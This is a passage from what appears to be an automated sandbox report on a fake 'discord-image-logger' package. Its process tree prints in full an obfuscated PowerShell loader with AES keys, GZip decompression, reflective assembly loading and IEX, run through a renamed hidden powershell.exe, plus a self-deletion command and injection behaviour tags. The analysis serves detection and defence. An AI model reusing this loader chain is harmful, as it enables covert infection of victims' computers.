'').('gnirtSteG'[-1..-9] -join '')($NUNZn2);$NUNZn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iUE4hGy8AZeVxL9AvErB6A==');$NUNZn3 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn3, 0, $NUNZn3.Length);$NUNZn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn3);$MSWRP.Dispose();$VbRCn1.Dispose();if (@(get-process -ea silentlycontinue $NUNZn3).count -gt 1) {exit};$Stjgn = [Microsoft.Win32.Registry]::$cmXWw.$ZYOXs($NUNZn).$igAgV($cBXxm);$hQsbc=[string[]]$Stjgn.Split('\');$YNdMX=SPSlI(PprBf([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[1])));aBEzg $YNdMX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NbCPC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[0]);$VbRCn = New-Object System.Security.Cryptography.AesManaged;$VbRCn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$nMOmr = $VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')();$NbCPC = $nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NbCPC, 0, $NbCPC.Length);$nMOmr.Dispose();$VbRCn.Dispose();$qrnaZ = New-Object System.IO.MemoryStream(, $NbCPC);$RJeXu = New-Object System.IO.MemoryStream;$eBeQA = New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::$NUNZn1);$eBeQA.$qpchR($RJeXu);$eBeQA.Dispose();$qrnaZ.Dispose();$RJeXu.Dispose();$NbCPC = $RJeXu.ToArray();$dlxUL = $YQTnf | IEX;$oxAUi = $dlxUL::$NUNZn2($NbCPC);$qVnjt = $oxAUi.EntryPoint;$qVnjt.$NUNZn0($null, (, [string[]] ($GlTUf)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2396 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2396).WaitForExit();[System.Threading.Thread]::Sleep(5000); function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create(); $VbRCn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VbRCn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VbRCn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='); $VbRCn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ=='); $nMOmr=$VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')(); $WZWky=$nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmAux, 0, $RmAux.Length); $nMOmr.Dispose(); $VbRCn.Dispose(); $WZWky;}function SPSlI($RmAux){ $qrnaZ=New-Object System.IO.MemoryStream(,$RmAux); $RJeXu=New-Object System.IO.MemoryStream; $eBeQA=New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::Decompress); $eBeQA.CopyTo($RJeXu); $eBeQA.Dispose(); $qrnaZ.Dispose(); $RJeXu.Dispose(); $RJeXu.ToArray();}function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}$VbRCn1 = New-Object System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$MSWRP = $VbRCn1.('rotpyrceDetaerC'[-1..-15] -join '')();$NUNZn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iZ8jPKmNkFdL1A6USwSGLA==');$NUNZn = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn, 0, $NUNZn.Length);$NUNZn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn);$cBXxm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=');$cBXxm = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBXxm, 0, $cBXxm.Length);$cBXxm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cBXxm);$GlTUf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2/VItTApDmqYld7UNbITmw==');$GlTUf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlTUf, 0, $GlTUf.Length);$GlTUf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GlTUf);$YQTnf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7u8mHn+uE8DouxrXvlfhI8HvaFVabiSu9wW1NQnVBW3d+pbXbyeWiMzHsShgQVzWTccLy3R/sL1Fgo2ngbj1Xyhdd8QHKlT7xJYowF1jSmMT/YNyn61oZ4EBOdIILtHY76iwoY89T/0NXOlbVQSqG6f76Tvu+/ljtRIjK68ygJujUjyjF9W1UFNXnjlbvKaQ0BTSj7AUpwYBspcSQUSWqlV4JZYmfkLzrzzafMFwHzW6zgfk8rU5wxN2vDnC7yji58n7rylZaggz4+okuyhoMrfM4k/T/mqHJ8VdUFO8xpIeX3hePuaZ5Z58y1CyCEoFhGVyjfm3AnZl3fgFnvsWSS15RXMq5KXGV3I38NkazdqvV05jjZTTECaOwsRwu2zLdJ29XVcSC4yPm3wAT5LZe+YH34hMw11+Tv5n+xxqwY=');$YQTnf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YQTnf, 0, $YQTnf.Length);$YQTnf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YQTnf);$CPWdf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vGf9ES1PdsfKW8Swn9bI3w==');$CPWdf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CPWdf, 0, $CPWdf.Length);$CPWdf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CPWdf);$igAgV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UiHcuo7jcw/WkburfrLBQ==');$igAgV = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igAgV, 0, $igAgV.Length);$igAgV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igAgV);$ZYOXs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hDpsuPmELCzhYTCugvhrpA==');$ZYOXs = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZYOXs, 0, $ZYOXs.Length);$ZYOXs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZYOXs);$cmXWw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Duasd/EcBtQj2cZsgiwg+Q==');$cmXWw = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cmXWw, 0, $cmXWw.Length);$cmXWw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cmXWw);$qpchR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KDa4G8PrmTjfH/8cqC5WDg==');$qpchR = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qpchR, 0, $qpchR.Length);$qpchR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qpchR);$NUNZn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkNHx2c/PIn2isifrSOkpw==');$NUNZn0 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn0, 0, $NUNZn0.Length);$NUNZn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn0);$NUNZn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QCQIFS3Mnpd27lKyoiLRsA==');$NUNZn1 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn1, 0, $NUNZn1.Length);$NUNZn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn1);$NUNZn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McBhlHe8GfiHzcJuHtKawA==');$NUNZn2 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn2, 0, $NUNZn2.Length);$NUNZn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn2);$NUNZn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iUE4hGy8AZeVxL9AvErB6A==');$NUNZn3 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn3, 0, $NUNZn3.Length);$NUNZn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn3);$MSWRP.Dispose();$VbRCn1.Dispose();if (@(get-process -ea silentlycontinue $NUNZn3).count -gt 1) {exit};$Stjgn = [Microsoft.Win32.Registry]::$cmXWw.$ZYOXs($NUNZn).$igAgV($cBXxm);$hQsbc=[string[]]$Stjgn.Split('\');$YNdMX=SPSlI(PprBf([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[1])));aBEzg $YNdMX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NbCPC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[0]);$VbRCn = New-Object System.Security.Cryptography.AesManaged;$VbRCn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$nMOmr = $VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')();$NbCPC = $nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NbCPC, 0, $NbCPC.Length);$nMOmr.Dispose();$VbRCn.Dispose();$qrnaZ = New-Object System.IO.MemoryStream(, $NbCPC);$RJeXu = New-Object System.IO.MemoryStream;$eBeQA = New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::$NUNZn1);$eBeQA.$qpchR($RJeXu);$eBeQA.Dispose();$qrnaZ.Dispose();$RJeXu.Dispose();$NbCPC = $RJeXu.ToArray();$dlxUL = $YQTnf | IEX;$oxAUi = $dlxUL::$NUNZn2($NbCPC);$qVnjt = $oxAUi.EntryPoint;$qVnjt.$NUNZn0($null, (, [string[]] ($GlTUf)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe" & del /f "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1924 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:4988
-
-
C:\Windows\system32\PING.EXEPING localhost -n 85⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6056
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5672
-
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe"5⤵
- Views/modifies file attributes
PID:5312
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat"2⤵
- Drops file in Windows directory
PID:3932 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of FindShellTrayWindow
PID:5392
-
-
C:\Windows\system32\net.exenet session3⤵PID:5348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:2092
-
-
-
C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe"build.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function iwkhR($DITIA){ $XVnki=[System.Security.Cryptography.Aes]::Create(); $XVnki.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XVnki.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XVnki.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8ehdS6ppW71xL6mDjAeXsyQHYKmv0CPtd6Kn4aXzt4='); $XVnki.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hx3HwApb8t08fxY/Go7cSw=='); $LrZFK=$XVnki.CreateDecryptor(); $return_var=$LrZFK.TransformFinalBlock($DITIA, 0, $DITIA.Length); $LrZFK.Dispose(); $XVnki.Dispose(); $return_var;}function kOuIB($DITIA){ $DbpkU=New-Object System.IO.MemoryStream(,$DITIA); $qZtjl=New-Object System.IO.MemoryStream; $JMgSB=New-Object System.IO.Compression.GZipStream($DbpkU, [IO.Compression.CompressionMode]::Decompress); $JMgSB.CopyTo($qZtjl); $JMgSB.Dispose(); $DbpkU.Dispose(); $qZtjl.Dispose(); $qZtjl.ToArray();}function ZkZVP($DITIA,$AoxAJ){ $HLgZK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$DITIA); $UXpIZ=$HLgZK.EntryPoint; $UXpIZ.Invoke($null, $AoxAJ);}$zVdRm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat').Split([Environment]::NewLine);foreach ($BYfmw in $zVdRm) { if ($BYfmw.StartsWith(':: ')) { $Rndkm=$BYfmw.Substring(3); break; }}$FMGlq=[string[]]$Rndkm.Split('\');$IgKIL=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[0])));$voFjb=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[1])));ZkZVP $voFjb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZkZVP $IgKIL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
PID:4708 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create(); $VbRCn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VbRCn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VbRCn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='); $VbRCn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ=='); $nMOmr=$VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')(); $WZWky=$nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmAux, 0, $RmAux.Length); $nMOmr.Dispose(); $VbRCn.Dispose(); $WZWky;}function SPSlI($RmAux){ $qrnaZ=New-Object System.IO.MemoryStream(,$RmAux); $RJeXu=New-Object System.IO.MemoryStream; $eBeQA=New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::Decompress); $eBeQA.CopyTo($RJeXu); $eBeQA.Dispose(); $qrnaZ.Dispose(); $RJeXu.Dispose(); $RJeXu.ToArray();}function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}$VbRCn1 = New-Object System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$MSWRP = $VbRCn1.('rotpyrceDetaerC'[-1..-15] -join '')();$NUNZn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iZ8jPKmNkFdL1A6USwSGLA==');$NUNZn = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn, 0, $NUNZn.Length);$NUNZn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn);$cBXxm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=');$cBXxm = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBXxm, 0, $cBXxm.Length);$cBXxm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cBXxm);$GlTUf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2/VItTApDmqYld7UNbITmw==');$GlTUf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlTUf, 0, $GlTUf.Length);$GlTUf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GlTUf);$YQTnf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7u8mHn+uE8DouxrXvlfhI8HvaFVabiSu9wW1NQnVBW3d+pbXbyeWiMzHsShgQVzWTccLy3R/sL1Fgo2ngbj1Xyhdd8QHKlT7xJYowF1jSmMT/YNyn61oZ4EBOdIILtHY76iwoY89T/0NXOlbVQSqG6f76Tvu+/ljtRIjK68ygJujUjyjF9W1UFNXnjlbvKaQ0BTSj7AUpwYBspcSQUSWqlV4JZYmfkLzrzzafMFwHzW6zgfk8rU5wxN2vDnC7yji58n7rylZaggz4+okuyhoMrfM4k/T/mqHJ8VdUFO8xpIeX3hePuaZ5Z58y1CyCEoFhGVyjfm3AnZl3fgFnvsWSS15RXMq5KXGV3I38NkazdqvV05jjZTTECaOwsRwu2zLdJ29XVcSC4yPm3wAT5LZe+YH34hMw11+Tv5n+xxqwY=');$YQTnf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YQTnf, 0, $YQTnf.Length);$YQTnf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YQTnf);$CPWdf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vGf9ES1PdsfKW8Swn9bI3w==');$CPWdf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CPWdf, 0, $CPWdf.Length);$CPWdf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CPWdf);$igAgV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UiHcuo7jcw/WkburfrLBQ==');$igAgV = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igAgV, 0, $igAgV.Length);$igAgV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igAgV);$ZYOXs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hDpsuPmELCzhYTCugvhrpA==');$ZYOXs = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZYOXs, 0, $ZYOXs.Length);$ZYOXs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZYOXs);$cmXWw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Duasd/EcBtQj2cZsgiwg+Q==');$cmXWw = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cmXWw, 0, $cmXWw.Length);$cmXWw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cmXWw);$qpchR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KDa4G8PrmTjfH/8cqC5WDg==');$qpchR = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qpchR, 0, $qpchR.Length);$qpchR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qpchR);$NUNZn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkNHx2c/PIn2isifrSOkpw==');$NUNZn0 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn0, 0, $NUNZn0.Length);$NUNZn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn0);$NUNZn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QCQIFS3Mnpd27lKyoiLRsA==');$NUNZn1 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn1, 0, $NUNZn1.Length);$NUNZn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn1);$NUNZn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McBhlHe8GfiHzcJuHtKawA==');$NUNZn2 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn2, 0, $NUNZn2.Length);$NUNZn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn2);$NUNZn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iUE4hGy8AZeVxL9AvErB6A==');$NUNZn3 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn3, 0, $NUNZn3.Length);$NUNZn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn3);$MSWRP.Dispose();$VbRCn1.Dispose();if (@(get-process -ea silentlycontinue $NUNZn3).count -gt 1) {exit};$Stjgn = [Microsoft.Win32.Registry]::$cmXWw.$ZYOXs($NUNZn).$igAgV($cBXxm);$hQsbc=[string[]]$Stjgn.Split('\');$YNdMX=SPSlI(PprBf([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[1])));aBEzg $YNdMX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NbCPC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[0]);$VbRCn = New-Object System.Security.Cryptography.AesManaged;$VbRCn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$nMOmr = $VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')();$NbCPC = $nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NbCPC, 0, $NbCPC.Length);$nMOmr.Dispose();$VbRCn.Dispose();$qrnaZ = New-Object System.IO.MemoryStream(, $NbCPC);$RJeXu = New-Object System.IO.MemoryStream;$eBeQA = New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::$NUNZn1);$eBeQA.$qpchR($RJeXu);$eBeQA.Dispose();$qrnaZ.Dispose();$RJeXu.Dispose();$NbCPC = $RJeXu.ToArray();$dlxUL = $YQTnf | IEX;$oxAUi = $dlxUL::$NUNZn2($NbCPC);$qVnjt = $oxAUi.EntryPoint;$qVnjt.$NUNZn0($null, (, [string[]] ($GlTUf)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:6052 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6052).WaitForExit();[System.Threading.Thread]::Sleep(5000); function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create(); $VbRCn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VbRCn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VbRCn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='); $VbRCn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ=='); $nMOmr=$VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')(); $WZWky=$nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmAux, 0, $RmAux.Length); $nMOmr.Dispose(); $VbRCn.Dispose(); $WZWky;}function SPSlI($RmAux){ $qrnaZ=New-Object System.IO.MemoryStream(,$RmAux); $RJeXu=New-Object System.IO.MemoryStream; $eBeQA=New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::Decompress); $eBeQA.CopyTo($RJeXu); $eBeQA.Dispose(); $qrnaZ.Dispose(); $RJeXu.Dispose(); $RJeXu.ToArray();}function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}$VbRCn1 = New-Object System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 